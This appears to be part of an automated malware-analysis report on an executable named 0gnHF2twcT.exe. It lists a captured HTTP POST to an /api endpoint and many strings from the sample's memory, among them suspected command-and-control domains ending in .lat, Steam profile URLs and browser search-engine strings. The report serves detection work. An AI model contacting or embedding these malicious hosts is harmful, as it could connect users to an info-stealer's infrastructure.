Source: unknown HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aspecteirs.lat:443/api
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowvc
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crosshuaht.lat
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grannyejh.lat:443/api
